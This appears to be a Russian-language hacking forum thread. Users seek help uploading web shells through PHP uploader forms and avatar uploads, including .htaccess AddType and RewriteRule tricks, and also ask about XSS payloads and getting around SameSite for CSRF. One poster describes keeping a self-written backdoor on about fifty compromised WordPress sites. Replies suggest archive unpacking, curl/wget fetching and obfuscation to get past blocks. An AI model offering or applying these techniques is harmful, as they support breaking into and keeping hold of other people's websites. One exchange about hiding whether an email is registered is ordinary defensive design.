Подскажите, что можно сделать в этой ситуации? Заливается без проблем: Code: <form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form> <?php if($_POST['_upl']=="Upload"){if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name']));}?> Админер к примеру тоже. Но если пробую залить шелл, получаю 403. Code: Forbidden You don't have permission to access this resource. Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.
Поди, WSO лить пытался? Из вариантов: zip/tar с последующей распаковкой; curl/wget; обфускация (или шелл попроще).
Не могу выполнить XSS, Помогите <a onclick="qwe.asd.zxc('a', 'b', тут пропускает ()' {} ); "> Пробовал создать 2 обьекта с функцией zxc(), не прокатывает вызов до создания
Очень круто сделано на hackerone.com при сбросе пароля для любой почты пишет что ссылка отправлена, это позволяет не палить зарегана почта или нет у них. Но как быть с формой регистраций что выводить если почта занята?
Отвечать так же - всё ок, а на почту слать месседж, что не стоит пытаться зарегаться повторно и правильным делом будет воспользоваться восстановлением пароля. Ну и на всякий случай, линк на заморозку аккаунта, если идет какой-то мухлёж.
Привет, сегодня посмотрел в Chrome и Cookie больше не отправляются при POST CSRF, как раскручивать POST CSRF? Что дальше?
Samesite cookie Искать html инъекцию или xss + medium.com/@renwa/bypass-samesite-cookies-default-to-lax-and-get-csrf-343ba09b9f2b
Есть вебсайт 1-localhost.domain, при обращении к которому всплывает единственная форма, где ручками нужно ввести дату рождения в числах и нажать кнопку ОК, такой себе 18+ ограничитель. После успешной проверки перекидывает на целевой ресурс 2-localhost.domain. Суть в том, что при правильном или неправильном вводе значений в папке где расположен скрипт (access.php) обработки этих значений появляются 2 файла: "good" и "notgood", где записываются данные из поля ввода таким образом: Code: ["2021-07-05 13:00:00"{"yy":"1_testantichat","mm":"2_testantichat","dd":"3_testantichat","submit":"OK"}] Расширения эти файлы не имеют. html и access.php кажется эти, но процесса создания файлов там не увидел: https://coderoad.ru/36852236/Возрастной-код-проверки-выгоняет-людей-из-дома-к-старости Подскажите, есть ли смысл в этом и если да, то куда копнуть? Спасибо
Подскажите, снесло ( а может и нет, выдает 403 ошибку ) все бэкдоры и шеллы за один день. Единственное, что объединяло сайты то, что они все на WP и залит бэкдор в файлы wp-content или wp-includes. Гео разные, хосты разные, приобретены доступы все в разное время. Что могло произойти ? Бэкдор самопис и служит мне года 2-3, залит не на так много сайтов.
Могли просто доступ к дикектории закрыть в случае если это wp-includes, и в wp-content могли, зависит от того где лежал конкретно. Скорее всего так и сделали, раз 403.
Я понимаю если бы это на одном сайты произошло, но проблема в том, что разные доступы на разных хостах, порядком 50 доступов отлетело.
Привет, помогите раскрутить если она тут есть, работает с инкогнито. http://facebook.com/plugins/close_popup.php?prev_url=javascript+:alert(9)
Всем привет. Пытаюсь залить шелл через загрузку аватара. php не заливаются, php3,php5,phtml и так далее не выполняются, выводятся просто текстом. .htaccess заливается, но "AddType application/x-httpd-php .jpg" не помогает, файл просто скачивается (если залить без htaccessa, то jpg открывается). Я так понимаю, тут 2 варианта 1. CHMOD, 2. htaccess в каталоге выше. Пробовал и "RewriteRule (?:^|/)1\.jpg$ - [T=application/x-httpd-php]", результат то же. Пробовал прописывать в хтачесе редиректы на другие каталоги и заливаться, но безуспешно, видимо, не хватает прав. Собственно вопрос: если это чмод, могу ли я как-то через htaccess, например, прочитать исходники? По типу работы этого редиректа: RewriteRule ^1\.jpg$ /%{QUERY_STRING} [NC,L]. Либо, если это второй вариант, отменить все условия htaccess в каталогах выше?
